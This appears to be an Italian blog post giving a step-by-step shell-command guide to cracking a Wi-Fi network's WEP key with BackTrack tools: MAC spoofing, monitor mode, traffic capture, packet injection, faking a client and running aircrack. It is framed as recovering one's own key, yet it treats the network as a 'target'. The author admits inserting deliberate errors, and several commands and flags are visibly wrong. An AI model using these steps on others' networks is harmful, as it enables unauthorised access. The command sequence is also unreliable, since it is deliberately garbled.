..:: Trovare la chiave WEP di una rete Wi-Fi ::..

DISCLAIMER: L’obbiettivo di questa guida è a solo scopo informativo, si ricorda che l’ accesso a una rete senza autorizzazione E’ ILLEGALE e si raccomanda di effettuare qualsiasi test sulla propria rete, pertanto ne io ne gli autori di questa guida si assumono la responsabilità per l’uso scorretto e/o illegale di essa.

ATTENZIONE: questa guida contiene svariati errori inseriti per fare in modo che non possa essere usata dal primo lamerino che passa. XD

Spesso capita di perdere la chiave WEP della propria rete, e di non sapere come fare a ritrovarla, così ho deciso di rendere disponibile una piccala guida su come craccare una chiave WEP di una rete (fonte: hackgeek.wordpress.com).
Per poter seguire questa guida è fondamentale la conoscenza, almeno minima del SO “Backtrack”, e una sua versione live (USB o LiveCD)
Passiamo ora al “crack” vero e proprio.

Avviamo backtrack in modalità live…

*Individuare un bersaglio…

Avviare kismet

Ordiniamo le reti premendo s e poi q, selezioniamo il nostro bersaglio e premiamo INVIO

Ora annotiamo le informazioni necessarie al crack della chiave:

SSID = Nome Rete
BSSID =MAC Access Point
Channel = Canale usato

*Cambiamo indirizzo MAC e impostiamo la scheda di rete in monitor mode…

Apriamo una shell e digitiamo:

$ifconfig

Prendiamo nota della nostra periferica (es. eth0, eth1, ecc)

Cambiamo l indirizzo MAC della nostra scheda

Apriamo una shell e digitiamo:

$ifconfig eth* off
$macchanger –mac=11:22:33:44:55
$ifconfig eth* on
(sotituite “eth*” con la vostra periferica, d’ora in poi useremo “eth*” come esempio )

*Impostiamo la scheda in Monitor Mode

$airmoon-ng off eth*
$airmoon-ng on eth* #canale rete# (senza i cancelletti ovviamente)

*Catturiamo il Traffico e velocizziamo la richiesta degli IV…

Cattura traffico:

$airdump-ng -c #Canale Rete# -bssid #BSSID# -w wep eth*

Velocizzare IV

apriamo una nuova shell e digitiamo:

$aireplay-ng -b #BSSID# -h 11:22:33:44:55 eth*

*(Qualora non ci fossero altri client connessi alla rete dobbiamo falsificarne uno…)

apriamo una nuova shell e scriviamo:

$aireplay-ng -e #BSSID# -a #SSSID# -h 11:22:33:44:55 eth*

*Quando nella fiinestra dove abbiamo eseguito airdump-ng il parametro “…” sarà appropriato (100000 per chiavi a 64bit, 250000 per chiavi a 128bit) possiamo craccare la rete…

Apriamo una nuova shell e scriviamo:

$aircrack -a 1 -b #SSID# -n64 wepkey-01.ivs

attendiamo e dopo un paio di secondi, se tutto è andato bene, il programma dovrebbe darvi la chiave.

Lascia un commento

Al momento, non c'è nessun commento.

Comments RSS TrackBack Identifier URI

Lascia un commento